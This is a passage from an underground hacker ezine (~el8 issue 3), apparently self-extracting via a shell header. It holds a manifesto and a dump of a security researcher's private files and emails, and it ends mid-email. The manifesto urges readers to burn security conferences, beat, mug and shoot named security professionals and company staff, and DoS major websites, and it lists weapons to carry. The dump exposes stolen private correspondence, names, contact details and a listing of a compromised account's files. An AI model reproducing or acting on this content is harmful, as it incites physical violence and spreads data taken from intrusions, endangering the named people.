el8.3
#!/bin/sh
################################################
## the gr8zt ez1ne t0 evr gr4ce this pl4ce. ##
## ---------------------------------------- ##
## IF YOU ALTER ANY PART OF THIS EZINE YOU ##
## WILL BE OWNED, RM'D, AND PUT IN NEXT ISSUE ##
## ------------------------------------------ ##
## IF YOU ALTER ANY PART OF THIS EZINE YOU ##
## WILL BE OWNED, RM'D, AND PUT IN NEXT ISSUE ##
## ------------------------------------------ ##
## IF YOU ALTER ANY PART OF THIS EZINE YOU ##
## WILL BE OWNED, RM'D, AND PUT IN NEXT ISSUE ##
## ------------------------------------------ ##
## the gr8zt ez1ne t0 evr gr4ce this pl4ce. ##
################################################
##::::::::::::::::::::::::::::::::::::::::::::##
##:'####::::::'########:'##::::::::'#######:::##
##'## ##:'##: ##.....:: ##:::::::'##.... ##::##
##..::. ####:: ##::::::: ##::::::: ##:::: ##::##
##:::::....::: ######::: ##:::::::: #######:::##
##:::::::::::: ##...:::: ##:::::::'##.... ##::##
##:::::::::::: ##::::::: ##::::::: ##:::: ##::##
##:::~el8[3]:: ########: ########:. #######:::##
##::::::::::::........::........:::.......::::##
################################################
## the definitive src for the Porno H/P Scene ##
################################################
## do "sh <ISSUE_NAME>" to extract eldump.c ##
## compile eldump.c and use it to extract ##
## the rest of the w4r3z: ##
## $ ./eldump el8.3.txt -vvv ##
## <*> whitehated.topcities.com ##
## <*> ftp.uu.net/tmp/EL8MAGAZINEDONTDELETE ##
## <*> keyword "~el8" on aol.com ##
## <*> www.textfiles.com/~el8 ##
## <*> nipc.gov/~el8 ##
## <*> www.fedworld.gov/0day/~el8 ##
## <*> www.fbi.gov/top10mostwanted/~el8 ##
## <*> www.securityfocus.com/weareowned.txt ##
## <*> www.incidents.org/~el8 ##
## <*> www.whitehats.com/weareowned.txt ##
## <*> www.blackhat.com/plzdonthurtus.txt ##
################################################
## where have all the 0dayz g0neeeeeeeeeeeee! ##
################################################
cat <<'-+-+'> /dev/null
[BOI]
[BEGIN_DIR] articles
.~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~.
|#$%$#@%!$@^%@$^!@#@#%!@#$^@!$#^%!@$#$%@!#$%^!@$^%#$^!@$%@#@^$#!@#|
|#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#|
|#::'####::::::'########:'##::::::::'#######::'##:'#######:'##:::#|
|#:'## ##:'##: ##.....:: ##:::::::'##.... ##: #::...... #:: #:::#|
|#:..::. ####:: ##::::::: ##::::::: ##:::: ##: #:::::::: #:: #:::#|
|#::::::....::: ######::: ##:::::::: #######:: #::: ######:: #:::#|
|#::::::::::::: ##...:::: ##:::::::'##.... ##: #:::..... #:: #:::#|
|#::::::::::::: ##::::::: ##::::::: ##:::: ##: #:::::::: #:: #:::#|
|#::::::::::::: ########: ########:. #######:: ##: #######: ##:::#|
|#:::::::::::::........::........:::.......:::..::.......::..::::#|
|#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#|
|#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#|
|#:::::::::::::::::FUCKN UP WHITEHATS SINCE 1998:::::::::::::::::#|
|#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#|
`~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~'
,-._,-._ .----------------------------------.
_,-\ o O_/; | OpenBSD! The proactively secure |
/ , ` `| | operating system! ... |
| \-.,___, / ` | FOR ME TO PISS ON! |
\ `-.__/ / ,.\ `----------------------------------'
/ `-.__.-\` ./ \'
/ /| ___\ ,/ `\
( ( |.-"` '/\ \ `
\ \/ ,, | \ _
\| o/o / \.
\ , / /
( __`;-;'__`) \\
`//'` `||` `\
_// || ;
.-"-._,(__) .(__).-""-. `
/ \ / \ '
\ / \ / `
`'-------` `--------'` ;
11:46PM up 2 days, 6:25, 22 users, load averages: 0.47, 0.27, 0.20
USER TTY FROM LOGIN@ IDLE WHAT
deraadt C0 - Wed05PM 5:57 emacs -nw -u deraadt -f zenicb
mickey p0 versalo.lucifier Wed07PM 15 icb -n mickey -g hackers -s cvs
millert p1 millert-gw.cs.co 3:37PM 2:48 tail -fn-100 /cvs/CVSROOT/ChangeLog
deraadt p2 v.openbsd.org Thu11PM 1:06 -csh
form p3 vell.nsc.ru Thu11PM 21:29 less /cvs/CVSROOT/ChangeLog
pvalchev p4 dsl-dt-207-34-11 Thu05PM 15 tail -fn-50 /home/hack/pvalchev/chan
deraadt p5 zeus.theos.com Wed05PM 0 systat vm 1
deraadt p6 zeus.theos.com Wed05PM 2days tail -f /cvs/CVSROOT/ChangeLog
deraadt p7 zeus.theos.com Wed05PM 3 -csh
deraadt p8 zeus.theos.com Wed05PM 3 gv scanssh.ps
deraadt p9 zeus.theos.com Wed05PM 1:26 emacs -nw -u deraadt -f mh-rmail
deraadt pa zeus.theos.com Wed05PM 16 less machdep.c
deraadt pb zeus.theos.com Wed05PM 16 -csh
deraadt pc zeus.theos.com Wed05PM 5:57 -csh
angelos pd coredump.cs.colu Thu02PM 2:48 icb -g hackers -h localhost -n angel
deraadt pe zeus.theos.com Wed05PM 2:29 -csh
provos pf ssh-mapper.citi. Wed05PM 27:21 tail -f I_AM_A_LUSER_AND_A_MORON
brad q0 speedy.comstyle. Wed06PM 28:27 tail -f /cvs/CVSROOT/ChangeLog
aaron q1 nic-131-c68-101. 8:43AM 15 icb -scvs -ghackers
lebel q2 modemcable093.15 Thu09PM 2:48 -bash
wvdputte q3 reptile.rug.ac.b 5:45AM 12:56 tail -f 2001-09
jason q4 24-168-200-128.w Thu08AM 1day -ksh
deraadt q5 hackphreak.org 4:20AM 0 w
~el8 is dope. kool-rad k-fat badassezinenodoubt
~el8 is dope. kool-fresh k-hip shit shit
~el8 is dope. k-hip k-kul elite elite
~el8 is dope. bad ass badaz eliteasshitaselite
~el8 is dope. k-hip fuck!. elite elite
~el8 is dope. kool-fresh ~el8!roxroxrox shit shit
~el8 is dope. kool-rad koolhipawesome badassezinenodoubt
.----------------------------------------------------------------.
; t4ble of h0ly w4r3z & bey0nd ; ;
`------------------------------' ;
; *00* ~e~ intr0duktion ;
; *01* ~e~ pr0jekt m4yh3m ;
; *02* ~e~ Know Your WhiteHat Enemy ;
; *03* ~e~ zeroday screen exploit ;
; *04* ~e~ lyfestylez of the owned and lamest with pm ;
; *05* ~e~ muz1k in the undergr0und ;
; *06* ~e~ defacements of the milenium ;
; *07* ~e~ ~el8 hitlist tools ;
; *08* ~e~ bronc buster busted ;
; *09* ~e~ lcamtuff helps ~el8 ;
; *10* ~e~ lyfestylez of the owned and lamest with jobe ;
; *11* ~e~ phrack staff demystified ;
; *12* ~e~ gobble blaster ;
; *13* ~e~ 1nterv1ew with te4m OG ;
; *14* ~e~ lyfestylez of the owned and lamest with aempirei ;
; *15* ~e~ chapter sixteen ;
; *16* ~e~ ELDUMP & ELTAG ~el8 ez1ne t00lz ;
`----------------------------------------------------------------'
.----------------------------------------------------------------.
; t4ble of ~el8 m3mbrZ ; ;
`----------------------' ;
; SiLLY G00S3 -> THe HiGH PReeZT ;
; FuNNY BuNNY -> a BLiP oN YOuR GaYDaR ;
; ODaY MaZTeR -> GeTZ aLL THe HoEZ and CoDEz ;
; ENRiCO -> INSaNe IN ThE MeMBRAiN ;
; ReDPUBeZ -> AkA KARRoT_BoTToM ;
; CaWCaW -> EYe'LL TEaR YoUR EyEZ OuT ;
; KRaD -> sO FReSH & sO CLEaN ;
; PoOtIeTaNG -> CRaZY CooL FRe$h ;
; UNCLe MaViS -> HaS YOu IN A HEaDLoK ;
; TcJ -> ThE CRiMiNaL JESuS ;
; CLiFF SToLE -> CLiFF SToLE YOUR CoDEz ;
; JaMeS BRoWN PaNTZ -> STAiNeD UNDeRWaREZ ;
; JoHNY SiX ToEZ -> MuTaTED MiKE ;
; DiNOSaUR MaN -> THe OLD SCHooL ;
; MiKE TySoN -> THe DaHMeR oF BoXiNG ;
; BaLLSaCK -> Mr HuGE NuTZ ;
; ARaB BiLL -> MeKKa DoN WoN ;
; KaRELeSS KaRL -> EyE DoNT WiPE LoGZ ;
; OSaMA BiN LaDEN -> GeORgE BuSH ;
; ThE UNiX TeRRoRiZt -> RM'z YoUR BoX WiTHOuT ReMORsE ;
; PuSSy FaCEd KiLLa -> GHoST FaCE KiLLaZ HoMEsLiCE ;
; CHiNeeZ TiMMy -> CReAM oF SuM YuN GaI ;
; SeXPaTRiOT -> THe PoRNo HaCKeR ;
; T z D -> TEaM ZeRODaY ;
`----------------------------------------------------------------'
.~e~----------------------------------------------------------~e~.
; *00* intr0duktion -- ~el8 TEaM ;
`----------------------------------------------------------------'
~el8 c0uld f1ll this ez1ne with s0 much shyt but we'd lyke
to release 0ver 150 issuez, s0 st4y tun3d. n0 intr0 n33ded.
we r the h4rdkore h4krz who clean your toilets, the h4rdkore k0derz
who forcefully w1pe y0ur wind0wz @ st0pl1ghtz and intersekti0nz,
the h4rdk0re phre4krZ who mow your l4wn, the h4rdk0re cr4krz
who ste4l cl0thez from the salvati0n army, we take yor orderz
at burger k1ng, we steal yor hubk4pz, we even put k4meraz in
port `o pottiez. *_DO_* *_NOT_* *_FUCK_* *_WITH_* *_US_*.
~el8
.~e~----------------------------------------------------------~e~.
; *01* pr0jekt m4yh3m -- ~el8 ;
`----------------------------------------------------------------'
w1th such h1gh figurez in the sekurity scene being 0wn3d and humili4ted,
eye h4ve t0 s4y that pr0jekt m4yhem has been a succ3ss. ~el8 kn0wz of
at le4st 153 DEDICATED FOLLOWERZ to the cause. th3r3 is of course, many
others who believe. pr0j3kt M4yh3m cellz oper8 ind3p3ndent of each 0ther.
w3 have in fact cre4t3d an army. w3 w1ll n0w n4me a very sm4ll porti0n of
pr0j3kt m4yh3m'z victims (th3r3 ar3 0th3rz muwhaah4hahah): k2, dugsong,
lance spitcock, horizon, Chris Spencer, provos, Toby Miller, Al Hugher,
ISS, NAI, QUALYS, EEYE, deraadt, route, @stake, Brian McWilliams, spaf,
zip, TESO, ADM, w00w00, HERT, BVIEW, 0k th1s l1st c4n g0 0n and 0n but w3
d0nt w4nt t0 w4ste it all in 0ne ez1ne. whY be t4rg3t3d by us wh3n y0u
can j0in us. why p0st info, codes, or bugs wh3n the end result iz y0ur
ent1re syst3m, f4mily, and friends being 0wn3d t0 mega-fuck. d0eznt it l00k
like more phun to be a bl4ckhat than a wh1tehat (th3r3 iz no inbetween).
w1th that being said, pr0j3kt mayh3m has been br0ught t0 a n3w l3vel.
n0 l0nger do we w4nt YOU OUR LOYAL FOLLOWERS to simplY 0wn s3kurity
fucks wh0 st3p 0n 0ur turph. w3 w4nt y0u t0 cause w0rldw1de physical
destructi0n to the sekurity industry infrastructure. but plz c0ntinue
t0 d0 a g00d j0b 0n the internet p0rti0n of projekt m4yhem.
h3re is h0w this can be accomplished:
------------------------------------'
* g0ing t0 defk0n or blackhat? initiat3 a n4palm stryke.
BURN THE M0THERFUCK3R D0WN. bre4k s0me computers. beat
the fuck 0ut 0f the whitehat puss1ez wh0 attend or g1ve
spe3chez. th1s can be done very easily with the us3 of
gas0line and or baseball bats. th1s meth0d applies at
all security/"h4ker" cons.
* loc8d near a security company? sh00t ISS employeez with a
paintball gun (y0u c4n us3 h1gh p0wer3d r1fl3z but iph
y0u g3t caught ur in f0r lyfe, s0 use p4intball gunz f0r
wh3n you are released you c4n c0ntinue y0ur missions). th1s
meth0d appliez t0 all sekurity companies loc8d near y0u.
h0wever, iph y0u w1sh t0 m4ke your MECCA pilgramag3 to ISS
HQ in ATLANTA, th3n thats f1ne by us.
* loc8d near a whitehat security d00d? g1ve em` a g00d mugging.
thre4ten them that if they c0ntinue in th1s m4nner, y0u w1ll
s1lence th3m f0rever. th1s meth0d w0rk3d in f0rc1ng hugh3r
d0wn fr0m his p0sition as bugtraq m0derat0r. th1s meth0d also
appliez f0r peo0ple wh0 wr1te f0r phr4ck and the like.
* sp3cial m3th0d, see a pers0n wear1ng s0me sort of "r00t" clothing,
be4t the fuck 0ut 0f them.
* special meth0d for missi0n #1 th4t st1ll n33dz t0 be accomplish3d:
DoS'n of maj0r sekurity websites. l3tz t4ke 0ut securityfocus,
neohapsis, google, incidents, packetstorm, and the lyke. f0ll0werz
of ~el8 muzt d0wn th3se s1tez 4ever. w3 w1ll shut them d0wn, and th3y
w1ll b0w t0 us. 0ther s1tez w0rth d0wning: freshmeat, slashdot,
hackphreak, blackhat, defcon, cnn, infonexus, packetfactory...
~el8's pr0jekt m4yhem sw1ss armY kn1fe:
--------------------------------------'
* w1re kutterz / metal kutters
* HERF gun
* spr4y p4int
* l1ghter fluid (or diesel fuel)
* p4ck of matchez
* one bick lighter
* some s0rt of face mask (one roll of panty hose)
* a backpack
* handkuff keys in the heel of your sne4kerz
* one smoke bomb and or hand grenade
* one rambo knife
* one hidden thumb tack
* one digital camera to record recruiting material
for the el8:
-----------'
* one taser / stun gun
* one bazooka
* one ak-47 or m-16
* one police scanner
* a pack of big chew bubble gum
* and one flame thrower
m1ssi0n 0n3 of pr0jekt m4yhem has b33n acc0mplizhed, and must c0ntinue
in itz 0n g0ing eff0rt t0 0wn the sekurity / whitehat scene. m1ssi0n tw0
is actu4lly easi3r t0 acc0mpl1sh, s0 l3tz g3t th1s 0ne r0ll1ng. th3 w4r
h4z been decl4red, the w4r has been initiated, th3 w4r iz being w0n.
-- ~el8 tEaM
.~e~----------------------------------------------------------~e~.
; *02* Know Your WhiteHat Enemy -- odaymaztr ;
`----------------------------------------------------------------'
Know Your WhiteHat Enemy - odaymaztr
------------------------------------
many of you may have heard of this great new project called 'the honeynet
project', aimed at getting a firsthand look at the blackhat hacker mindset
and to share the lessons learned. at first glance, you blackhats may think
'oh n0!@# im screwed !@# these whitehats with their 'modified to log' sh
binarys are getting so so tricky!@#'. at first it may have seemed a little
threatening, but after looking over their whitepapers, apprehension
quickly turned to laughter. we were also a little confused when we noticed
that evil ADM guys such as 'K2' were part of this whitehat organization.
so we decide to investigate ...
$ id
uid=100(ktwo) gid=100(users) groups=100(users)
$ pwd
/export/home/ktwo
$ ls -al
drwxr-x--x 16 ktwo users 4096 .
drwxr-xr-x 8 root root 4096 ..
drwx------ 3 ktwo users 4096 .BitchX
-rw-r--r-- 1 ktwo users 0 .addressbook
-rw------- 1 ktwo users 2285 .addressbook.lu
-rw-r--r-- 1 ktwo users 1289 .admirc
-rw------- 1 ktwo users 5194 .bash_history
-rw-r--r-- 1 ktwo users 82 .bashrc
drwx------ 2 ktwo users 4096 .gnupg
-rw-r--r-- 1 ktwo users 34 .less
-rw-r--r-- 1 ktwo users 114 .lessrc
drwxr-xr-x 2 ktwo users 4096 .ncftp
-rw------- 1 ktwo users 14498 .pinerc
lrwxrwxrwx 1 ktwo users 7 .profile -> .bashrc
-rw-r--r-- 1 ktwo users 5 .qmail-default
drwx------ 2 ktwo users 4096 .screen
-rw-r--r-- 1 ktwo users 3394 .screenrc
drwx------ 2 ktwo users 4096 .ssh
drwxr-xr-x 3 ktwo users 4096 .ssh2
-rw-r--r-- 1 ktwo users 257118 02-03-06 CORE_IMPACT.pdf
-rw-r--r-- 1 ktwo users 211975 194_HPYN2E_te_16.ZIP
-rw-r--r-- 1 ktwo users 3281174 194_HPYN2E_te_16.doc
-rw-r--r-- 1 ktwo users 71145 admirc-0103090536.tgz
drwxr-xr-x 10 ktwo users 4096 admirc1
-rw-r--r-- 1 ktwo users 12091 apache-iss.tgz.pgp
-rw-r--r-- 1 ktwo users 3830 attn.tar.gz
-rw-r--r-- 1 ktwo users 7782 authorbio_instructions.zip
-rw-r--r-- 1 ktwo users 1827 beto.asc
drwxr-xr-x 2 ktwo users 4096 bin
-rw-r--r-- 1 ktwo users 32840 caddis-dtspcd.c
-rw-r--r-- 1 ktwo users 9810 caddis-radius.c
-rw-r--r-- 1 ktwo users 1384 caddis.key
-rw------- 1 ktwo users 264 dead.letter
drwxr-xr-x 6 ktwo users 4096 dl
-rw-r--r-- 1 ktwo users 69408 dtscp.tgz
drwxr-x--- 3 ktwo users 4096 dtspc
-rw-r--r-- 1 ktwo users 27150 dtspcd-8.6.tgz
-rw-r--r-- 1 ktwo users 4833 exploit.html
-rw-r--r-- 1 ktwo users 3008 gpg-pubkey.asc
drwxr-xr-x 2 ktwo users 4096 ida
-rw-r--r-- 1 ktwo users 4535 ihack.c
-rw-r--r-- 1 ktwo users 7710 infect.tar.gz
-rw-r--r-- 1 ktwo users 47765 irc.txt
-rw-r--r-- 1 ktwo users 2268 job
-rw-r--r-- 1 ktwo root 188416 list.mdb
drwx------ 2 ktwo users 4096 mail
-rw------- 1 ktwo users 35331378 mbox
-rw-r--r-- 1 ktwo users 912 msg
-rw-r--r-- 1 ktwo users 1642 msg.asc
-rw-r--r-- 1 ktwo users 3008 new-pub.asc
-rw-r--r-- 1 ktwo users 1720 noir
-rw-r--r-- 1 ktwo users 1634 pubkey.pgp
-rw-r--r-- 1 ktwo users 3824 solar-atach
-rw-r--r-- 1 ktwo users 2064 solar-msg
-rw-r--r-- 1 ktwo users 12 solar-msg.asc
-rw-r--r-- 1 ktwo users 177 suid
-rw-r--r-- 1 ktwo users 43 super
drwxr-xr-x 3 ktwo users 4096 tmp
-rw-r--r-- 1 ktwo users 19668 ttdb.c
after exploring all his shells (zolo rulez dewD!!#), the ~el8 investigative
unit decided to search his email for clues...
(J4n3 and D1ck used in some cases to protect the innocent!)
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: Lance Spitzner <lance@honeynet.org>
To: K2 <ktwo@ktwo.ca>
Subject: Re: dtspcd exploit obtained (fwd)
Your buddy interested in chatting with the MITRE folks?
Alot of people are very impresses with his exploit :)
--
Lance Spitzner
http://project.honeynet.org
---------- Forwarded message ----------
From: J4ne <J4ne@mitre.org>
To: Lance Spitzner <lance@honeynet.org>
Subject: Re: dtspcd exploit obtained
I went to the apparent authors website. It hardly mentions an interest in security,
but it does look like he used to teach at the University of Central Michigan
http://jdrake.qoop.org/art/ has some pictures of him. Are you familiar with this
person at all?
I'm wondering if he didn't write this code to teach someone else and then that person
started distributing it. This guy looks like he knows his stuff and not stripping the
symbols doesn't seem to fit with that.
J4n3
Lance Spitzner wrote:
> J4n3 wrote:
>
> > It was very nice of the author to include his name and email :). I was looking
> > at the strings output and it looks like the author took a lot of time to do error
> > checking and write one of the better usage statements i've seen. I also didn't
> > notice a single misspelling and no script kiddish text at first glance. To me
> > that says a few things about the author. Is this typical of what you see in
> > exploit code? Most of the stuff i've seen in public postings is nowhere near
> > this clean.
>
> Its extremely well written, and powerful. Definitely not our
> typical exploit :)
>
> lance
note: mitre has elite modified strings binary to see if author has done proper
error checking (very kewl!!!)
note: use strip on binarys to confuze forensic analysis!!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: Lance Spitzner <lance@honeynet.org>
To: K2 <ktwo@ktwo.ca>
Subject: Re: dtspcd exploit obtained (fwd)
K2 wrote:
> I'll ask him
Dude, this is not a big deal. Just a lot of
people interested in his exploit code, its more
impressive then most. NSA and FBI even asked
me for a copy. :)
lance
note: kn0ck kn0ck eff-bee-eye stiq em up script kid!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: Lance Spitzner <lance@honeynet.org>
To: D1ck Song <D1ck@monkey.org>, "'D1ck Ruiu'" <dr@kyx.net>,
K2 <ktwo@ktwo.ca>, J4ne Roesch <J4ne@sourcefire.com>
Subject: For Project, OBSD on Sun or Intel?
Gents,
Seeing as how you are respected OpenBSD guru's, AND
members of the Project, wanted to throw this question
at you.
Looks like we might get an OC12 and hardware donated
to the Project, specifically for our internal and external
webserver and project Infrastructure. We will be standardizing
on OpenBSD.
Since we have our choice of software, is there any security
value add installing OpenBSD on Sparc, or is Intel fine?
My line of thinking is the non-Intel architecture would help
defeat some exploit code. Or am I just wasting time and
making life harder with OpenBSD on Sparc?
Thanks!
--
Lance Spitzner
http://project.honeynet.org
note: yeah ur wastin ur time bro, we'd own u even if u installed netbsd on ur xbox.
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: "D1ck H. Rowland" <D1ck@psionic.com>
To: "J4ne Hines" <J4ne@pitt.edu>, <honeypots@securityfocus.com>
Subject: RE: DTSPCD Exploit
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hey all, I've had several Solaris honeypots compromised where 2 files
> (kcsun and antisun) binaries were uploaded, used and than deleted.
> Does anyone by any chance (Lance?) know if these are the filenames
> for the highly searched for DTSPCD exploit? If not, has anyone whose
> honeypots been compromised seen these files downloaded to their box
> for use before?
>
> Can't pull up anything on these filenames at Google. Please advise.
On a similar note, has anyone tried putting append-only flags on the
target directories to keep the people from removing these files? I'm
looking for anyone with experience in using append-only *directories* on
honeypots (not just append-only logs). There does not appear to be any
references talking about using this technique from what I've seen.
Yeah I already know the arguments: "Immutable flags can be bypassed by a
knowledgeable attacker..." I suppose the real question is how many
people are going to stick around once they found out they're effectively
hacking a system with a WORM drive (I suspect not many). Additionally, I
would like to tie a measure like this to some type of system timer
(external or otherwise) that will shut down the connection after X
minutes have elapsed of intruder activity. This could help catch them in
midway through the panicking process and could lead to some interesting
results.
Thanks,
-- D1ck
note: i thought rm'd binarys were not a problem for u forensic experts!
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: D1ck Eckholt <D1ck@crank.de>
Subject: Re: ADMmutate
Hey, I am not @ honme for another week, but if you want too look into it I
supply a paper and some demonstration exploits and vulnerabilities in
http://www.ktwo.ca/c/ADMmutate-0.8.4.tar.gz I do my testing against snort
or RealSecure works good :)
Later,
K2
D1ck Eckholt wrote:
> hello to canada ;-)
>
> first at all, sorry for my bad english, but i'll try my very best.
> i am a german student and i want to make an short presentation
> about your "ADMmutate" tool. i need a little support for doing
> that and so i hope, you can help me:
>
> 1.) which software (network IDS) is the best for a simple test ?
> my unix/linux skills are not the best, so i would prefer a IDS
> (maybe an older one) for windows NT.
> 2.) do you have or know a sourcecode of a simple buffer-overflow
> exploit, which can be used with your tool in a presentation ?
> 3.) do you know good links where a can go deeper into this topic ?
>
> so i hope, you have time to help me with my stupid questions, but
> i am very interested in this work and i am standing just at the beginning...
>
> thanks and greetings from germany
>
> D1ck eckholt
>
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: J4ne Oon <J4ne@bee-net.com>
cc: 'D1ck Ruiu' <D1ck@kyx.net>
Subject: Re: Security Consulting Opportunity
James: Lance had copied Dragos and myself on this message. We are based
in Vancouver, BC Canada and have quite a bit of experience doing network
penetration assessments. Dragos has over a decade in the network security
field and has been closely tied with the IDS community for some time as
well. We are both currently members of the Honeynet Project and have
developed our skills over a long period of detailed technical study and
review. As both of us are out of town until December 10 working on other
client engagements, could you give us a bit more detailed explanation of
the size and scope of the assessments and reviews you would like
conducted. Information as too weather or not you would need a local
presence and the estimated duration of this project.
Thank you.
K2
Lance Spitzner wrote:
> James Oon wrote:
>
> James, I'm afraid I'm unable to commit to this, however I
> have copied to experts in this field, they may be able to
> help you out.
>
> Thanks!
>
> > G'day Lance,
> >
> > My name is James Oon, and I was with Sun Microsystems Professional
> > Services
> > based in Singapore from 1995 to 2000. I have left since for a
> > consulting company
> > called BEENET.
> >
> > Anyway, the purpose of the email is to to enquire regarding your
> > interest to do a
> > security audit for stock exchange. The job is to perform a
> > penetration test and
> > security review. Problem is that some of the machine is on S/390
> > (especially the
> > backend). We are willing to pay a handsome sum for the job.
> >
> > Please email me back if you are interested or if you know someone
> > else who is
> > interested.
> >
> > Many thanks.
> >
> > Regards
> > James Oon
> >
>
> --
> Lance Spitzner
> http://project.honeynet.org
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: D1ck f4ce <silvio@qualys.com>
Subject: Re: virus (err.. cansecwest)
Elite!!! I spoke with dragos and he thinks it'd be an awesome addtion too
the conf. Sure man, just prep a powerpoint show for the conf or something
or however you wanna give a talk. Give dragos a showt (dr@kyx.net) or msg
him on IRC, i finally got his ass to show up pretty consistantly in
#!w00w00 (usually nik dr or something) I think he's mesg'ng you now but I
think it's late over there... Let me know how it all goes, I thnk it'd be
fun to finally get together ;)
We'll be partieng hardcorein Vancouver man :)
K2
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Catherine Nolan <catherine@syngress.com>
Subject: Re: Hack Proofing Your Network, Second Edition
Hi Catherine: Sounds like an interesting proposition, could you send me
the outline and the list of open chapters in case anything else sparks my
interest? Also would it be possiable to see a copy of the first edition
so I could get an idea of the writing style of the rest of the book. I'm
out of town until Monday so please forgive the poor spelling in this email
(no access too a good email client when I am remote).
Thanks and I look forward to hearing from you,
K2
Catherine Nolan wrote:
> Hello K2 -
>
> Please allow me to introduce myself as the acquisitions editor for Syngress
> Publishing, my name is Catherine Nolan.
>
> Your name was forwarded to me by Ryan Russell as a potential author for the
> second edition of his book Hack Proofing Your Network: Internet Tradecraft.
> In particular Ryan has recommended you for the chapter on IDS Evasion.
>
> You would be joining the esteemed authoring team already in place consisting
> of Kingpin, RSnake, Rain Forest Puppy, Dan Kaminsky, Ryan Permeah, Hal
> Flynn, Marc Maiffret (?), and of course Ryan Russell.
>
> I have an outline available for the topics to be covered in this chapter, if
> you are interested in reviewing it please contact me at your earliest
> convenience. Also, this chapter is available in the first editon.
>
> If this topic is not of interest, but you are interested in contributing let
> me know and I'll forward you a list of the other open chapters.
>
> We are currently offering $18/ per manuscript page as compensation for this
> chapter. We would expect that the new chapter could be delivered in one
> month's time.
>
> I look forward to hearing from you regarding this matter.
>
> Thank you in advance for your cooperation,
> Catherine
> Catherine B. Nolan
> Acquisitions Editor
> catherine@syngress.com
> 781-681-5151 ext 18
>
> Syngress Publishing
> 800 Hingham Street
> Rockland, MA 02370
> http://www.syngress.com
note: ~el8 will sabotage Hack Proofing Your Network II
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: Ryan "D1ck sucking" Russell <ryan@securityfocus.com>
Subject: Re: book...
CHP 16 IDS Evasion
Ryan Russell wrote:
> Excellent. Just to confirm, which chapter do they have you working on?
>
> Ryan
>
> K2 wrote:
>
> > Hey Ryan, how's it goin? Thanks for the opertunity in working on your
> > book, it seems like a pretty cool group. I'm spending some time working
> > out my draft for next week. I'll probably demo against snort and
> > RealSecure. Hope it's all going well.
> >
> > Thanks,
> > K2
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: <ryan@securityfocus.com>
Subject: Hailstorm
Ryan, I Know you said to use Hailstorm as an example of some packey level
evasions, but I believe clicktosecure.com is down and I cannot find much
literature about this product. Do you have anything that I could look at?
I am going to go on about dugsongs fragrouter and horizons Defeating
Sniffers and Intrusion Detection Systems phrack paper that included
congestant.c
note: k2, the click and point specialist
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: "Jennifer 8. Lee" <jenny@nytimes.com>
Subject: RE: APCO?
Just some work with the honeynet, developing some code and tools for use
in a few applications. Real life work is pretty demanding right now,
allthough I am trying to find openings in the US. I want to be closer to
some family.
TTYL,
K2
Jennifer 8. Lee wrote:
>
> okay. how are you doing? are you working on something interesting?
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: J4ne Nolan <catherine@syngress.com>
Subject: RE: Chapter
Here you go...
Hope there arent too many bugs, visio died on me so I had to dump one of
the diaagrams.
K2
Catherine Nolan wrote:
> Sure....I'm usually okay with extending dates a day or so. I'll look
> forward to reviewing your chapter first thing tomorrow morning.
>
> C
>
> Catherine B. Nolan
> Acquisitions Editor
> catherine@syngress.com
> 781-681-5151 ext 18
>
> Syngress Publishing
> 800 Hingham Street
> Rockland, MA 02370
> http://www.syngress.com
>
> -----Original Message-----
> From: K2 [mailto:ktwo@ktwo.ca]
> To: Catherine Nolan
> Subject: Re: Chapter Delivery Reminder
>
> Catherine, can you actually give me until the end of day Monday (eg.
> 8pm) I am going to be travelling all day and will not have net acess
> until then.
>
> Thanks,
> K2
>
> Catherine Nolan wrote:
>
> > Hi Guys -
> > I'd like to remind you all that your completed first drafts of your
> chapters
> > will be due this coming Monday. I would prefer that they be submitted to
> me
> > during working hours. I can't tell you how many people think Monday means
> > Tuesday....because they submit their work at 11:20 PM.
> >
> > I hope that this will help you plan your weekends accordingly.
> >
> > Thank you all for your hard work thus far - keep it up!
> >
> > Best,
> > Catherine
> > Catherine B. Nolan
> > Acquisitions Editor
> > catherine@syngress.com
> > 781-681-5151 ext 18
> >
> > Syngress Publishing
> > 800 Hingham Street
> > Rockland, MA 02370
> > http://www.syngress.com
%-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-%
From: K2 <ktwo@ktwo.ca>
To: J4ne Spitzner <lance@honeynet.org>
Subject: Re: dtspc attack
